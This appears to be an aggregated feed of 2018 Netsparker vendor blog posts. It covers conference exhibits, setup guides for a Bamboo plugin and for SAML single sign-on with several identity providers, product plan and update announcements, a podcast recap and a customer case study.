Infosecurity Europe 2018 Netsparker Banner

This year Netsparker will be exhibiting at Infosecurity Europe, the continent’s number one information security event. The event will be taking place between the 5th and the 7th of June 2018 at the Olympia Conference Centre.

Visit Netsparker at Booth H110 at Infosecurity Europe 2018

Our team will be representing Netsparker at booth H110 and will be more than happy to answer any questions you might have about identifying security flaws and our market leading web application security scanner.

Visit the Infosecurity Europe website for a copy of the agenda and more information about the conference.

We look forward to meeting you there!

How to Install and Configure the Netsparker Cloud Scan Bamboo Plugin

$
0
0

Bamboo is an automation server that enables software developers to build automation into their projects by supplying plugins. Bamboo functionality can be extended by using our new Netsparker Cloud Scan Bamboo plugin.

This article explains how to use the new Netsparker Cloud Bamboo plugin to integrate Netsparker Cloud with Bamboo in order to enable our advanced integration functionality.

integrating netsparker cloud with bamboo

Downloading and Installing Netsparker Cloud Scan's Bamboo Plugin

The Netsparker Cloud Scan Bamboo plugin is packaged into a jar file called netsparkercloud-bamboo-plugin.jar. This package has been tested and approved for Bamboo version 6.4.0+.

To Download and Install the Netsparker Cloud Scan Bamboo Plugin

  1. Open Netsparker Cloud. From the menu, select Integrations, then New Integrations

    integrations menu in netsparker cloud
  2. From the Continuous Integration Systems panel, select Bamboo. The Bamboo Plugin Installation and Usage window is displayed.

    bamboo plugin installation and usage
  3. Click Download the plugin, and save the file to a location of your choice.
  4. Open Bamboo.
  5. From the Bamboo Administration dropdown, click Add-ons. The Global Settings window is displayed.

    bamboo administration of add-ons for netsparker cloud
  6. From the Add-ons section, Click Upload add-on.
  7. Select the netsparkercloud-bamboo-plugin.jar file you downloaded previously, and upload.

    bamboo add-on upload for netsparker cloud
  8. Finally, refresh the page.

Configuring the Bamboo Project

Each Bamboo project has its own plans. Each plan has its own jobs which contains tasks. To use The Netsparker Cloud Scan task, it must be added to a job.

How to Configure the Bamboo Project

  1. Open Bamboo. In the Administration window, from the Add-ons section of the main menu, click Netsparker Cloud. The Global Netsparker Cloud API Settings window is displayed. 

    configuring bamboo project for netsparker cloud
  2. In the API Settings section, enter the API credentials: Netsparker Cloud Server URL and API Token.
  3. Click Test Connection.
  4. Click Save.
  5. From the main menu, click Projects. The Projects window is displayed.

    selecting netsparker cloud in bamboo projects
  6. Under projects window, select the project to which you want to add the Netsparker Cloud Scan plugin. The project’s window is displayed. 

    netsparker cloud scan plugin in bamboo
  7. Under The project’s window, select the plan to which you want to add the Netsparker Cloud Scan plugin. The plan’s window is displayed.
  8. Click Actions then click configure plan. The Plan Configuration window is displayed.
  9. Under the stages tab, select a job which you want to add the Netsparker Cloud scan task. The Tasks window is displayed. 

    bamboo tasks window netsparker cloud
  10. Click Add task, then select Netsparker Cloud Scan Task. The Netsparker Cloud Scan Task configuration window is displayed. 

    adding task for netsparker cloud
  11. From the  Netsparker Cloud Scan Task configuration window,  select the relevant Scan Settings. 

    selecting relevant scan settings in bamboo for netsparker cloud
  12. Finally, click Save.

Viewing Netsparker Scan Results in Bamboo

When the build has been triggered, you can view the scan results in the (under build results page) Netsparker Scan Result tab.

How to View Netsparker Scan Results in Bamboo

  1. Open Bamboo. On your Build Result window, click the Netsparker Cloud Report tab. If the scan is not yet finished, a warning message is displayed. 

    viewing netsparker cloud results in bamboo
  2. When the scan has been completed, the scan results within the NETSPARKER CLOUD EXECUTIVE SUMMARY REPORT, are displayed. 

    displaying netsparker cloud executive summary report in bamboo

Ferruh Mavituna Talks About Security in the SDLC on Paul's Security Weekly Podcast

$
0
0

Ferruh Mavituna, Founder and CEO of Netsparker, was interviewed by Paul Asadoorian and host Larry Pesce for Paul's Security Weekly #557, with Jeff Man joining them via Skype. They talked about the role of dynamic web application testing (DAST) within the Software Development Life Cycle (SDLC).

  • After explaining what the SDLC is, Ferruh noted the positive trend to bring security into the cycle at the development stage ('SecDevOps') so that secure coding is implanted deep and early in the development process. In DevOps, it is important to have a short and continuous feedback loop to support all the release cycles. Ferruh proposed that when developers write vulnerable code, they can be informed the same day, even within minutes, if the scans are fast enough.
  • They discussed other reasons why it is valuable to bring security considerations in as early into the software development cycle as possible. Finding security issues and vulnerabilities early in the process is less expensive. There is a shorter time lag between when the code is written and when it is fixed, so it's still fresh in the developer's mind. And developers can learn from the start how to write more secure code.
  • They considered the challenges of implementing DAST/SAST in organization. Part of the problem lies in the perception that dynamic testing (accuracy) produces false positives, while static testing has potential impacts on performance (speed). Netsparker solves both problems by providing dynamic testing that delivers proof-based vulnerability detection, while allowing for incremental scanning, so that, after the initial scan, subsequent scans are much shorter.
  • Everyone agreed that Integrating DAST into the SDLC is the best possible solution because the SDLC is the right place to tackle the problem. There is a lack of equivalence between the size of application security teams on one hand, and the number and size of the applications, websites and enterprises security needs on the other. An automatic web scanner a requirement to keep pace with the speed and volume of development.
  • Ferruh concluded by mentioning the integration focus of Netsparker. You can easily integrate and automate Netsparker into your existing SDLC, even during the early stages of development. And, you can integrate Netsparker with other security tools in the SDLC. Ferruh singled out the work Netsparker has done recently to ensure the ease of integration with the Jenkins and TeamCity plugins.

How to Configure SAML-Based Single Sign-On Integration

$
0
0

Setup instructions may vary by the identity provider(IdP). Contact us if you encounter any problem while setting up Single Sign-On (SSO) integration.

How to Configure SAML-Based Single Sign-On Integration
  1. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the SAMLv2.0 tab.

Configure SAML-Based Single Sign-On Integration

  1. If your IdP (Identity Provider) requires you to specify a SAML Identifier for Netsparker Cloud (it may also be referred as the Audience or Target URL), use the value of the Identifier field.
  2. If your IdP requires you to specify Consumer URL (it may also be referred to as the  SSO Endpoint or Recipient URL), use the value of the SAML 2.0 Service URL field.
  3. Retrieve the URL from your IdP's SSO Endpoint field and paste it into Netsparker's SAML 2.0 Endpoint field.
  4. Export your X.509 certificate, copy its content and paste the certificate value into Netsparker's X.509 Certificate field.
  5. Click Save Changes.

 

How to Configure Azure Active Directory Single Sign-On Integration with SAML

$
0
0

Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

How to Configure Azure Active Directory Single Sign-On Integration with SAML
  1. Log in to the Azure Portal and navigate to Azure Active Directory. The Overview window is displayed.

  1. Click Enterprise applications. The Enterprise applications window is displayed.

  1. Click New application. The Add your own application window is displayed.

  1. Select Non-gallery application.
  2. In the Name field, enter a name, and click Add. The quick start window is displayed.

  1. Click on Configure single sign-on (required). The Single Sign-on window is displayed.

  1. From the Single Sign-on Mode dropdown, select SAML-based Sign-On.

  1. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Azure Active Directory tab. Copy the URL from the SAML 2.0 Service URL field.
  2. In Azure Active Directory, paste the URL into the Reply URL field.
  3. In Netsparker Cloud's Single Sign-On window, copy the URL from the Identifier field
  4. In Azure Active Directory, paste the URL into the Identifier field.
  5. Click Save.
  6. Click Configure NetsparkerCloud (the name you entered in the Name field in Step 5). The Configure Sign-On window is displayed.

 

  1. In the window that is displayed, copy the URL from the the SAML Entity ID field.
  2. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Azure Active Directory tab. Paste the URL into the Idp Identifier field.

  1. In Azure Active Directory, copy the URL from the SAML Single Sign-On Service URL field.
  2. In Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
  3. In Azure Active Directory, download and copy the content of the X.509 Certificate field.
  4. In Netsparker Cloud's Single Sign-On window, paste the URL into the X.509 Certificate field.
  5. Click Save Changes.

How to Configure Microsoft Active Directory Federation Services Single Sign-On Integration with SAML

$
0
0

Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

These instructions were prepared using Windows Server 2016, though other, recent versions should also work.

There are two parts to this procedure:

  • Part 1: Adding a Relying Party Trust
  • Part 2: Edit Claim Issuance Policy
How to Configure Microsoft Active Directory Federation Services Integration with SAML (Part 1: Adding a Relying Party Trust)
  1. Open Microsoft Active Directory Federation Services Management. The AD FS window is displayed.

  1. From the AD FS node, click Relying Party Trusts.
  2. In the Actions pane, click Add Relying Party Trust. The Add Relying Party Trust Wizard is displayed.

  1. In the Welcome step, click Start.

  1. Select Enter data about the relying party manually, and click Next.

  1. In the Display Name field, enter a display name and click Next. The Configure Certificate step is displayed.

  1. Accept the defaults by clicking Next. The Configure URL step is displayed.

  1. Select Enable support for the SAML 2.0 WebSSO protocol.
  2. Then log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Active Directory Federation Services tab:
  • Next, copy the URL from the SAML 2.0 Service URL field
  • In the Microsoft AD FS Wizard, paste the URL into the Relying party SAML 2.0 SSO service URL field
  • In the Microsoft AD FS Wizard, click Next. The Configure Identifiers step is displayed.
    1. In the AD DS tab in Netsparker Cloud's SSO window, copy the URL from the Identifier field.
    2. In the Microsoft AD FS Wizard, paste the URL into the Relying party trust identifier field. Click Add, then Next. The Choose Access Control Policy step is displayed

    1. Select Permit everyone and click Next. The Ready to Add Trust step is displayed.

    1. Review your settings, and click Next. The Finish step is displayed.

    1. Click Close.
    How to Configure Microsoft Active Directory Federation Services Integration with SAML (Part 2: Edit Claim Issuance Policy)
    1. Open Microsoft Active Directory Federation Services Management. The AD FS window is displayed.

    1. From the AD FS node, click Relying Party Trusts. The Relying Party Trust that you have just created is listed in the central pane.

    1. Right click the relying party trust and select Edit Claim Issuance Policy. The Edit Claim Issuance Policy for NetsparkerCloud dialog box is displayed.

    1. Click Add Rule. The Add Transform Claim Rule wizard is displayed.

    1. From the Claim rule template dropdown, select Send LDAP Attributes as Claims.
    2. Click Next. The Configure Claim Rule step is displayed.

    1. In the Claim rule name field, enter a name.
    2. From the Attribute store dropdown, select Active Directory.
    3. In the Mapping of LDAP attributes to outgoing claim types section, select the following attributes from the drop-down lists.
    LDAP AttributesOutgoing Claim Type
    User-Principal-NameName ID
    Given-NameGiven Name
    SurnameSurname
    1. Click Finish.
    2. Download AD FS SAML Metadata from https://<server-address>/FederationMetadata/2007-06/FederationMetadata.xml
    3. Open the downloaded AD FS SAML metadata file, and copy the URL located in the EntityDescriptor node>entityID attribute:
      • Then, log in to Netsparker Cloud, and from the main menu click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select Active Directory Federation Services tab, and the paste the URL into Idp Identifier field.
      • Next, copy the URL from the SingleSignOnService node>Location attribute field.
      • Then in Netsparker Cloud's Single Sign-On window, paste the URL into SAML 2.0 Endpoint field.
      • Finally, copy the content of the X509Certificate node (signing).
      • Then in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

    1. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    How to Configure Okta Single Sign-On Integration with SAML

    $
    0
    0

    Configuring Okta Single Sign-On Integration with SAML

    Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

    How to Configure Okta Single Sign-On Integration with SAML
    1. Log in to your Okta account and navigate to the Admin dashboard.

    The Dashboard is displayed.

    1. From the Shortcuts menu, click Add Applications. The Add Application window is displayed.

    1. Click Create New App. The Create a New Application Integration dialog is displayed.

    1. In the Sign on method field, select SAML 2.0 and click Create. The Create SAML Integration window is displayed and opens at the General Settings tab.

    1. In the App name field, enter a name, and click Next. The Configure SAML tab is displayed.

    1. Log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed:
    • Copy the URL from the SAML 2.0 Service URL field.
    • Then in Okta, paste the URL into the Single sign on URL field.
    • In Netsparker Cloud's Single Sign-On window, copy the URL from the Identifier field.
    • Finally, in Okta paste the URL into the Audience URI (SP Entity ID) field.
  • In Okta, click Next. The Feedback tab is displayed.
    1. Click Finish, and ensure that you assign your users.
    2. Navigate to the Applications window and click the Sign On tab. The Sign On tab is displayed.

    1. Click View Setup Instructions.

    1. In the window that is displayed:
    • Copy the URL from the Identity Provider Issuer field.
    • Then log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Okta tab and paste the URL into the Idp Identifier field.
    • Next, copy the URL from the Identity Provider Single Sign-On URL field.
    • Then in Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
    • Copy the content from the X.509 Certificate field.
    • Finally, in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

    1. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    How to Configure Pingidentity Single Sign-On Integration with SAML

    $
    0
    0

    Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

    How to Configure PingIdentity Single Sign-On Integration with SAML
    1. Log in to your PingIdentity account and navigate to My Applications.

    1. Click Add Application, then New SAML Application.

    The Application Details window is displayed.

    1. Complete the Application Name and Application Description fields.
    2. From the Category dropdown, select an option.
    3. Click Continue to Next Step. The Application Configuration window is displayed.

    1. Select I have the SAML configuration.
    2. Next, log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the PingIdentity tab.
    • Copy the URL from the SAML 2.0 Service URL field.
    • Then, in PingIdentity's Application Configuration window, paste the URL into the Assertion Consumer Service (ACS) field.
    • Finally, in Netsparker, copy the URL from the Identifier field.
    • Then, in PingIdentity's Application Configuration window, paste the URL into the Entity ID field.
  • Click Continue to Next Step. The SSO Attribute Mapping window is displayed.
    1. Click Save & Publish. The Review Setup window is displayed.

    1. In the SAML Metadata field, click Download to download the SAML metadata.
    2. Click Finish, and assign your users.
    3. Open the downloaded SAML metadata file, and copy the URL located in the EntityDescriptor node>entityID attribute:
    • Then, log in to Netsparker Cloud, and from the main menu click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select PingIdentity tab, and the paste the URL into Idp Identifier field.
    • Next, copy the URL from the SingleSignOnService node>Location attribute field.
    • Then in Netsparker Cloud's Single Sign-On window, paste the URL into SAML 2.0 Endpoint field.
    • Finally, copy the content of the X509Certificate node (signing).
    • Then in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

    1. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    How to Configure Google Single Sign-On Integration with SAML

    $
    0
    0

    Using Security Assertion Markup Language (SAML), a user can use their managed account credentials to sign in to enterprise cloud applications via Single Sign-On (SSO). An Identity Provider (IdP) service provides administrators with a single place to manage all users and cloud applications. You don't have to manage individual user IDs and passwords tied to individual cloud applications for each of your users. An IdP service provides your users with a unified sign-on across all their enterprise cloud applications.

    How to Configure Google Single Sign-On Integration with SAML

    1. Log in to your Google account and navigate to the Admin console.

    1. Click Apps. The Apps window is displayed.

    1. Click SAML apps. The SAML Apps window is displayed.

    1. Click Add a service/App to your domain. The Enable SSO for SAML Application window is displayed.

    1. Click SETUP MY OWN CUSTOM APP. The Google IdP Information window is displayed.

    1. Take a note of the IdP Information: SSO URL, Entity ID and Certificate. (You will need them in a later step.)
    2. In IDP metadata, click DOWNLOAD.
    3. Click NEXT. The Basic information for your Custom App window is displayed.

    1. Enter an Application Name and click NEXT. The Service Provider Details window is displayed.

    1. In the ACS URL field, copy and paste in the contents of the SAML 2.0 Service URL field from Netsparker Cloud's Single Sign-On window.
    2. In the Entity ID field, copy and paste in the contents of the Identifier field (URL) from Netsparker SSO configuration window.
    3. Click NEXT. The Attribute Mapping window is displayed.

    1. Click FINISH.
    2. Return to the SAML Settings window.

    1. From the More Options (ellipsis), select ON for everyone.
    2. In the IdP Information note panel:
    • Copy the URL from the Entity ID field.
    • Then log in to Netsparker Cloud, and from the main menu, click Settings, then Single Sign-On. The Single Sign-On window is displayed. Select the Google tab, and paste the URL into the Idp Identifier field.
    • Next, copy the URL from the SSO URL field.
    • Then in Netsparker Cloud's Single Sign-On window, paste the URL into the SAML 2.0 Endpoint field.
    • Finally, copy the content from the downloaded X.509 Certificate field.
    • Then in Netsparker Cloud's Single Sign-On window, paste it into the X.509 Certificate field.

    1. In Netsparker Cloud's Single Sign-On window, click Save Changes.

    Netsparker and Single Sign-On Support

    $
    0
    0

    The Netsparker web application security solution is designed to be an integral part of the Software Development Lifecycle (SDLC) environment: developers commit new code or updates, then Netsparker Cloud automatically scans the commits and reports any identified issues, ensuring the applications are secure before they are moved to a live environment.

    Businesses that have successfully integrated Netsparker Cloud into their SDLC and DevOps environments, and have involved their developers in the vulnerability scanning and management processes are already benefiting from financial savings and more secure web applications and web services. To facilitate the hassle-free involvement of all relevant developers and other team members, Netsparker Cloud now supports Single Sign-On (SSO).

    Why Single Sign-on?

    When you integrate Netsparker Cloud in your environment and enable Single Sign-On, users do not have to manually log in to Netsparker Cloud each time they want to access a vulnerability report or scan results. Instead, their already authenticated session is used to access the Netsparker Cloud dashboard and all the information they require.

    Which Authentication Services Does Netsparker Cloud Support?

    Netsparker Cloud Single Sign-On Support

    Netsparker Cloud can also be integrated with these authentication services, so that users do not have to sign in when they already have a session and need to access Netsparker Cloud:

    Netsparker Plans & Editions Integration

    $
    0
    0

    There are two editions of the Netsparker web application security scanner:

    • Netsparker Desktop– an on-premises, single user Windows application
    • Netsparker Cloud– a multi-user enterprise and scalable solution available as a hosted and on-premises solution

    Both editions use our unique Proof-Based Scanning technology and though they are different, they complement each other, as used by many of our biggest customers.

    Typically Netsparker Cloud is integrated into the SDLC, DevOps and live environments to scan thousands of web applications and web services as they are being developed or running in live environments.

    Individuals use Netsparker Desktop to conduct manual analysis, exploitation and when they are required to do more advanced testing, such as on an individual component that requires user input. This is why we developed an integration module that allows users to synchronize scan data and vulnerability information between the editions.

    Our new Netsparker Team and Enterprise plans empower businesses who will now have access to both and don't have to decide between solutions. The plans also allow users to share data between the editions using a central data repository.

    The New Netsparker Plans

    Netsparker Standard – this plan includes Netsparker Desktop, which allows you to scan up to 20 websites

    Netsparker Team– this plan includes access to both Netsparker Desktop and Netsparker Cloud, allowing you to scan up to 50 websites

    Netsparker Enterprise– this plan is similar to the Netsparker Team plan and is ideal for anyone who manages more than 50 websites

    Features and Advantages of the Integration Available with the New Netsparker Plans

    Having access to both Netsparker Desktop and Netsparker Cloud means you can use the integration feature to synchronize and share scan and vulnerability data between solutions. We have developed this new feature so that you can:

    • Enjoy the freedom to use either solution for your scans
    • Have a central repository that stores all scan results
    • Easily share scan data with your entire team
    • Conduct manual analysis and advanced tests on Netsparker Cloud scans

    Use Either Solution to Launch Vulnerability Scans

    This integration module and licensing model affords you the freedom to use either scanning solution for your web vulnerability scans. When you purchase either the Team or Enterprise plan, you will have access to both products. This means that you have both the flexibility you need to run scans en masse with Netsparker Cloud, yet are still able to dive into the finer details of a single target website with Netsparker Desktop.

    Central Repository for All Scan Results & Sharing Data With the Team

    It’s time to get organized! The integration nature of this update makes it possible for you to import all individually saved Netsparker Desktop scan results directly into Netsparker Cloud, our multi-user, central cloud-based solution.

    Netsparker Cloud's strength is demonstrated by its ability to automatically correlate different scans on the same target, so that when they are imported, it generates a Trend Matrix report that displays trending data about the status of detected vulnerabilities.

    Manual Analysis & Advanced Web Security Tests

    Since Netsparker Desktop is an on-premises software solution, it has a number of tools that are not available on Netsparker Cloud, including HTTP Request builder, exploitation tools, Controlled Scan, Internal Proxy and more. Developers and security professionals sometimes need access to these tools so they can further troubleshoot and analyse a security issue, and to carry out manual testing.

    The integration further allows you to export the results of a scan, including all the vulnerability details, such as the HTTP requests and responses, from Netsparker Cloud to Netsparker Desktop. From there, you can then use its built-in penetration testing tools on the scan results for further analysis and manual tests.

    May 2018 Netsparker Update – New plans, UI & Single Sign-on Support

    $
    0
    0

    Last year we released a Netsparker update on an almost monthly basis. This year we’ve been a little quieter, but we have not been sitting still. We have been working on a major update that we're delighted to be able to announce today – the new Netsparker Team and Enterprise plans!

    This May 2018 update is not just about the new plans – that’s just the highlight. Read this post for an overview of all is new, improved and fixed in this major update of the Netsparker Web Application Security Scanner.

    The All New Netsparker Standard, Team & Enterprise Plans

    There will no longer be a distinction between Netsparker Desktop and Netsparker Cloud in licensing or pricing. We have integrated the two editions in our new plans. Now, when you purchase the Netsparker Team or Enterprise plan, you will have access to both the on-premises Windows software (Netsparker Desktop) and the hosted or on-premises edition of Netsparker Cloud.

    To complement these plans, we have added new functionality in both editions that enables you to connect them, and then easily share scanning and vulnerability data between them. We have explained the advantages of these new plans over individual licenses, and the integration functionality in our Integration Announcement.

    This same approach is being applied to all of the editions’ scanning capabilities and coverage. Since both Netsparker Cloud and Desktop solutions use the Proof-Based Scanning technology, new scanning engine updates, security checks and coverage updates will be implemented in both editions of the Netsparker web application security scanner.

    Support for Single Sign-On

    We have always encouraged our users – especially those who integrate Netsparker Cloud in their SDLC, DevOps and other environments – to involve their entire team in the process of identifying, triaging and fixing vulnerabilities.

    Now, including the team in all processes is much easier with the introduction of Single Sign-On support. Anyone who needs to access scan and vulnerability data on the Netsparker dashboard can easily do so securely, without the need to login. For a full explanation, see Netsparker and Single Sign-on support.

    Netsparker Cloud Single Sign-On Support

    Off-the-Shelf Web Applications and JavaScript Libraries – Coverage & Vulnerability Detection Improved Five-Fold

    Developers use many off-the-shelf web applications, frameworks and third-party components in their custom web applications. And, why not? Why reinvent the wheel when someone else has already done it for you?

    The problem, as with every other type of software, is that these off-the-shelf components need to be kept up to date to address any security issues they might have. Netsparker has provided a solution. We have an extensive database that also contains security checks for third party, off-the-shelf web applications and frameworks, ensuring they are also scanned for vulnerabilities. In this release, Netsparker’s coverage of off-the-shelf web applications and JavaScript frameworks has been improved five-fold. We've added more web applications to the list along with new security checks for web applications that were already in our database.

    New User Interface & Visual Features

    This latest Netsparker update has an awesome new UI and visual features.

    A New Skin for Netsparker Desktop

    Once you launch Netsparker, you’ll immediately notice the new skin of the on-premises scanner: new colours, sharper icons and fonts and better support for high-DPI monitors.

     A New Skin for Netsparker Desktop

    The Ribbon

    We have also replaced the top drop-down menus with a new ribbon to make the features more accessible to you, a concept you'll already be familiar with from Microsoft Office.

    The Ribbon

    Dockable Panels

    Multi-display lovers will undoubtedly enjoy this feature. All panels in Netsparker Desktop, such as the sitemap, scan progress and vulnerability details panels, can now be undocked. This enables you to easily customise your own a SpaceX-style dashboard, as illustrated.

    Dockable Panels

    New Security Checks & Improved Coverage

    To ensure that our scanner continues to fulfil its reputation as the scanner that detects most vulnerabilities, we have added a number of new security checks in this update and have improved countless numbers of existing security checks. Here are the highlights:

    • Server-Side Template Injection security checks (Malicious users can exploit this type of server-side flaw by managing to do unauthorized changes to a website template, possibly adding own malicious code, so when the template is parsed by the web application the attacker can read sensitive data and in some cases it can even lead to remote code execution.)
    • Expect-CT HTTP header security check (Netsparker checks that the Expect-CT HTTP header is properly implemented. The Expect-CT (certificate transparency) HTTP header is used by websites to report and even enforce the Certificate Transparency requirements, which are basically used to request a browser to check that the website's certificate is valid (i.e. is listed in the public CT logs). Refer to the Certificate Transparency official website for more information).
    • Improved the Anti-CSRF token support to also support tokens in HTTP headers and HTML meta tags.

    Other Notable Highlights in this May 2018 Netsparker Update

    • Smart Card authentication support (support for PKCS#11 certificates on smart cards on authenticated scans)
    • Improved support for Swagger, YAML, React and similar web technologies
    • An new OWASP Top 10 2017 compliance report template
    • Support for multiple sitemaps in robots.txt
    • And many other updates

    For a complete list of what is new, improved and fixed in this update refer to the Netsparker Desktop changelog and the Netsparker Cloud changelog.

    Netsparker To Exhibit at OWASP AppSec EU 2018 in London

    $
    0
    0

    OWASP AppSec EU 2018

    Netsparker is sponsoring and exhibiting at OWASP AppSec EU 2018. The conference exhibit will be taking place from July 4-6, 2018 at the Queen Elizabeth II Centre.

    Join Us at the Diamond Sponsor Booth at OWASP AppSec EU 2018

    Come and visit us at the Diamond sponsor booth in the exhibitor area, to learn how our Proof-Based Scanning Technology can help you save both time and money while automatically detecting vulnerabilities listed in the OWASP Top 10.

    For more information about the conference, visit the official OWASP AppSec EU 2018 website.

    £100 off Discount Code for OWASP AppSec EU 2018!

    Use the discount code EU18-NETSPRK100 when buying your OWASP AppSec EU 2018 Conference Ticket to get a £100 discount.

    We look forward to meeting you there!

    Sumeru Solutions – Netsparker Case Study

    $
    0
    0

    "We like Netsparker not only because it is able to be configured quickly, but also the scans themselves are completed quickly, reliably and without false positives (a large timesaver in and of itself)."

    Scanning web applications at scale is arguably one of the more confronting challenges for any web security professional. This interview, with Sumeru's Lead Penetration Tester, explains why he selected Netsparker above other solutions, to manage, automate and accelerate the security scanning of their clients' websites.

    Can you tell us a little about Sumeru Solutions and your role within the company?

    Sure, I’m an Information Security Analyst with Sumeru. We’ve been in the Information Technology Services business for a little over a decade. We actually started out quite small – just 3-4 individuals making great software.

    We now have clients worldwide – 22 countries to be exact – who rely on us for their web application services, information security and business process management needs.

    Our clients include entrepreneurs, banks, hotels, airlines, political parties and more. We’re very passionate about what we do and have a strong sense of purpose.

    We presently have three offices: one in the US, one in the UK and one in India. Also, we also have a joint venture office in Africa.

    As far a certifications go, we are a Microsoft Gold Certified Partner, CERT-In as well as a ISO 27001 Certified Company.

    Can you share some information about your decision to use Netsparker?

    We started using Netsparker in 2013 with the intention of automating and speeding up our web scanning process to find vulnerabilities. We have since made automated vulnerability scanning a part of our regular pen testing process.

    Prior to using Netsparker, we were performing manual testing for critical flaws and implementing web firewalls. However, because we manage a tremendous amount of critical customer data and sensitive information, finding a way to make our scanning process as consistent and reliable as possible was a top priority.

    We did take some time to test other web application security scanners and found that set-up time and reliability were not really comparable to Netsparker.

    What can you tell us about your current use of Netsparker?

    Obviously, after 10 years in business, we have developed some very consistent practices and procedures.

    We currently use Netsparker five days per week and scan four different web applications on a revolving basis. These consist of both civilian and government applications built on a variety of web frameworks and running on different types of servers. Netsparker handles this variety with ease.

    Did Netsparker discover any vulnerabilities that you’re comfortable disclosing?

    Yes! In several critical applications, Netsparker was able to identify both SQL injection and code execution vulnerabilities, two vulnerability types it’s very good at discovering.

    Have you had an opportunity or need to call our customer service or sales teams? How was that experience?

    Yes we have and we’ve always found the customer service to be entirely satisfactory – exactly what we would expect from such a mission-critical part of our business.

    If you had to summarize Netsparker in just a single sentence, what would you say?

    Netsparker is our tool of choice for scanning large web applications and it’s great at finding SQL Injection vulnerabilities.

    Viewing all 1027 articles
    Browse latest View live